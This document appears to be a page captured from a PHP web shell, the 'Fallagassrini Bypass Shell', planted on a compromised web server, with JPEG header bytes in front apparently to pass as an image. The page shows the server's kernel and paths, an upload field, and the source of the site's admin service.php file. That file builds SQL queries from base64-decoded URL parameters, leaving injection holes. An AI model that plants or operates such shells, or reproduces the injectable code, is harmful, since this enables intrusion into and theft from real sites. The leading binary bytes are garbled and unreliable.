JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/designcr/public_html/admin/

Linux server.meentosys.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Upload File :
Current File : /home/designcr/public_html/admin/service.php

<?php
function __autoload($class){
    include("classess/".$class.".php");
} 

$sqlfun = new sqlfunction();
$admin = new admin_login();

$admin->security_check();
$sid = $admin->call_session();
$getdate =$admin->getdates();
ob_start();
?>
<!DOCTYPE html>
<html lang="en">
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <!-- Meta, title, CSS, favicons, etc. -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <title>BKSCPL</title>

    <!-- Bootstrap -->
    <link href="../vendors/bootstrap/dist/css/bootstrap.min.css" rel="stylesheet">
    <!-- Font Awesome -->
    <link href="../vendors/font-awesome/css/font-awesome.min.css" rel="stylesheet">
    <!-- NProgress -->
    <link href="../vendors/nprogress/nprogress.css" rel="stylesheet">
    <!-- iCheck -->
    <link href="../vendors/iCheck/skins/flat/green.css" rel="stylesheet">
    <!-- bootstrap-wysiwyg -->
    <link href="../vendors/google-code-prettify/bin/prettify.min.css" rel="stylesheet">
    <!-- Select2 -->
    <link href="../vendors/select2/dist/css/select2.min.css" rel="stylesheet">
    <!-- Switchery -->
    <link href="../vendors/switchery/dist/switchery.min.css" rel="stylesheet">
    <!-- starrr -->
    <link href="../vendors/starrr/dist/starrr.css" rel="stylesheet">
    <!-- bootstrap-daterangepicker -->
    <link href="../vendors/bootstrap-daterangepicker/daterangepicker.css" rel="stylesheet">
    <script src="ckeditor/ckeditor.js"></script>
  <script src="ckeditor/sample/js/sample.js"></script>
  <link rel="stylesheet" href="ckeditor/sample/css/samples.css">
  <link rel="stylesheet" href="ckeditor/toolbarconfigurator/lib/codemirror/neo.css">
    <!-- Custom Theme Style -->
    <link href="../build/css/custom.min.css" rel="stylesheet">
  </head>

  <body class="nav-md">
    <div class="container body">
      <div class="main_container">
        <div class="col-md-3 left_col">
          <div class="left_col scroll-view">
            <div class="navbar nav_title" style="border: 0;">
              <a href="" class="site_title"><span>BKSCPL</span></a>
            </div>

            <div class="clearfix"></div>

            <!-- menu profile quick info -->
            <div class="profile clearfix">
              <div class="profile_pic">
               <!-- <img src="images/img.jpg" alt="..." class="img-circle profile_img">
              </div>
              <div class="profile_info">
                <span>Welcome,</span>
                <h2>Admin</h2>-->
              </div>
            </div>
            <!-- /menu profile quick info -->

            <br />

            <!-- sidebar menu -->
            <?php include("sidebar.php");?>
            <?php
$err=$category="";
$heading=$link=$des=$des2="";
if(isset($_POST['Submit']))
{
$post=$_POST;    
  $data = array(
    "id" => "", 
    "heading" =>$_POST['heading'],
    "des"     =>$_POST['des'],
    "des2"    =>$_POST['des2'],
    "status"  => "2"
  );
    
        $sqlfun->ins_data("service",$data);
            
        $succ = "Your Details has been Submited";
       // header("Refresh:1; url=service.php");        
    } else {      $imgerr = "Image Type Should be upload only gif,jpeg,jpg,png.";
    } 


//Edit Data
if(isset($_POST['Update'])){
  $post = $_POST;
  $urlid = base64_decode($_GET['urlid']);

   
  $data = array( 
    "heading" =>$_POST['heading'],
    "des" =>$_POST['des'], 
    "des2"    =>$_POST['des2'],
    "status" => "2" 
  );
        
  $cnd = " id='$urlid'";  
      $sqlfun->updated("service",$data,$cnd);
      $succ = "Your Details has been Updated Successfully.";
            header("Refresh:1; url=service.php");                       
  } else {
      $imgerr = "Image Type Should be upload only gif,jpeg,jpg,png.";
  }


//delete data
if(isset($_GET['delid'])){
   $delid =base64_decode($_GET['delid']); 
  $cnd1 = " id='$delid'"; 
  $check = $sqlfun->fetchdata("service",$cnd1);  
   
   //Update only customer Table
   if($check->rowCount()==0){
     header("Location: service.php");
   } else {             
        $data = array(
          
           "status" => "0",
          
        );
         if($sqlfun->updated("service",$data,$cnd1)){    
          $succ = "Your File has been deleted Successfully.";
          // header("Refresh:1; url=service.php");  
          
         } else {
           $err = "Internal Error.";
         }                         
   }
   //End Update only customer Table
 
}

?>
            <!-- /sidebar menu -->

            <!-- /menu footer buttons -->
            <div class="sidebar-footer hidden-small">
              
              <a data-toggle="tooltip" data-placement="top" title="Logout" href="logout.php">
                <span class="glyphicon glyphicon-off" aria-hidden="true"></span>
              </a>
            </div>
            <!-- /menu footer buttons -->
          </div>
        </div>

        <!-- top navigation -->
        <?php include("header.php");?>
        <!-- /top navigation -->

        <!-- page content -->
        <div class="right_col" role="main">
          <div class="">
            <div class="page-title">
              <div class="title_left">
                <h3>Update Service</h3>
              </div>

              <div class="title_right">
                <div class="col-md-5 col-sm-5 col-xs-12 form-group pull-right top_search">
                  <div class="input-group">
                    <!--<input type="text" class="form-control" placeholder="Search for...">
                    <span class="input-group-btn">
                      <button class="btn btn-default" type="button">Go!</button>-->
                    </span>
                  </div>
                </div>
              </div>
            </div>
            <div class="clearfix"></div>
        </div>
        <div class="row">
              <div class="col-md-12 col-sm-12 col-xs-12">
                <div class="x_panel">
                  <div class="x_title">
                    <h2>Add New Service</h2>
                    <ul class="nav navbar-right panel_toolbox">
                      <li><a class="collapse-link"><i class="fa fa-chevron-up"></i></a>
                      </li>
                      <li class="dropdown">
                        <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-expanded="false"><i class="fa fa-wrench"></i></a>
                        <ul class="dropdown-menu" role="menu">
                          <li><a href="#">Settings 1</a>
                          </li>
                          <li><a href="#">Settings 2</a>
                          </li>
                        </ul>
                      </li>
                      <li><a class="close-link"><i class="fa fa-close"></i></a>
                      </li>
                    </ul>
                    <div class="clearfix"></div>
                  </div>
                  <div class="x_content">
                    <br>
                     <?php  
        //Start For edit if already exist data then edit
          if(isset($_GET['urlid'])){  
            $urlid = base64_decode($_GET['urlid']);
          $cnd = " id='$urlid'";
          $check = $sqlfun->fetchdata("service",$cnd);         
             $btnname = "Update";
              $fontcls = "fa fa-pencil-square-o";         
          if($row = $check->fetch(PDO::FETCH_OBJ)){ 
            $heading = $row->heading;
            $des  = $row->des;
            $des2 = $row->des2;
          }
        } else {
                $btnname = "Submit";
            $fontcls = "fa fa-check text-defalut";
        }
                      
        ?>

                    <form class="form-horizontal form-label-left" action="<?php htmlspecialchars($_SERVER['PHP_SELF']);?>" method="post" enctype="multipart/form-data">

                      
                      

                     <div class="form-group">
                        <label class="control-label col-md-3 col-sm-3 col-xs-12" for="first-name">Heading<span class="required">*</span>
                        </label>
                        <div class="col-md-6 col-sm-6 col-xs-12">
                          <input type="text" id="first-name" name="heading" value="<?php echo    "$heading";?>" placeholder="Enter title" class="form-control col-md-7 col-xs-12">
                        </div>
                      </div>


                       <div class="form-group">
                        <label class="control-label col-md-3 col-sm-3 col-xs-12">Description 1:<span class="required">*</span>
                        </label>
                        <div class="col-md-6 col-sm-6 col-xs-12">
                              <textarea cols="30" rows="5"  class="ckeditor" name="des"  id="editor" class="form-control textarea" placeholder="Enter Description.." required><?php echo $des;?></textarea>
                        </div>
                      </div>


                      <div class="form-group">
                        <label class="control-label col-md-3 col-sm-3 col-xs-12">Description 2:<span class="required">*</span>
                        </label>
                        <div class="col-md-6 col-sm-6 col-xs-12">
                              <textarea cols="30" rows="5"  class="ckeditor" name="des2"  id="editor" class="form-control textarea" placeholder="Enter Description.." required><?php echo $des2;?></textarea>
                        </div>
                      </div>

                     

                      
                      
                      <div class="ln_solid"></div>
                      <div class="form-group">
                        <div class="col-md-6 col-sm-6 col-xs-12 col-md-offset-3">
                          
                          
                         <button type="submit" class="btn btn-success" name="<?php echo $btnname;?>" ><i aria-hidden="true"></i>&nbsp; <?php echo $btnname;?></button>
                        </div>
                      </div>

                    </form>
                  </div>
                </div>
                <div class="x_panel">
              
                    </form>       
                                    <p class="text-center text-danger bold"><?= $err;?></p> 
                                  
                      </div>         
                </div>
              </div>  

                </div>
              </div>
            </div>
        <!-- /page content -->
      </div>
    </div>
    

    <!-- jQuery -->
    <script src="../vendors/jquery/dist/jquery.min.js"></script>
    <!-- Bootstrap -->
    <script src="../vendors/bootstrap/dist/js/bootstrap.min.js"></script>
    <!-- FastClick -->
    <script src="../vendors/fastclick/lib/fastclick.js"></script>
    <!-- NProgress -->
    <script src="../vendors/nprogress/nprogress.js"></script>
    <!-- bootstrap-progressbar -->
    <script src="../vendors/bootstrap-progressbar/bootstrap-progressbar.min.js"></script>
    <!-- iCheck -->
    <script src="../vendors/iCheck/icheck.min.js"></script>
    <!-- bootstrap-daterangepicker -->
    <script src="../vendors/moment/min/moment.min.js"></script>
    <script src="../vendors/bootstrap-daterangepicker/daterangepicker.js"></script>
    <!-- bootstrap-wysiwyg -->
    <script src="../vendors/bootstrap-wysiwyg/js/bootstrap-wysiwyg.min.js"></script>
    <script src="../vendors/jquery.hotkeys/jquery.hotkeys.js"></script>
    <script src="../vendors/google-code-prettify/src/prettify.js"></script>
    <!-- jQuery Tags Input -->
    <script src="../vendors/jquery.tagsinput/src/jquery.tagsinput.js"></script>
    <!-- Switchery -->
    <script src="../vendors/switchery/dist/switchery.min.js"></script>
    <!-- Select2 -->
    <script src="../vendors/select2/dist/js/select2.full.min.js"></script>
    <!-- Parsley -->
    <script src="../vendors/parsleyjs/dist/parsley.min.js"></script>
    <!-- Autosize -->
    <script src="../vendors/autosize/dist/autosize.min.js"></script>
    <!-- jQuery autocomplete -->
    <script src="../vendors/devbridge-autocomplete/dist/jquery.autocomplete.min.js"></script>
    <!-- starrr -->
    <script src="../vendors/starrr/dist/starrr.js"></script>
    <!-- Custom Theme Scripts -->
    <script src="../build/js/custom.min.js"></script>
  
  </body>
</html>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net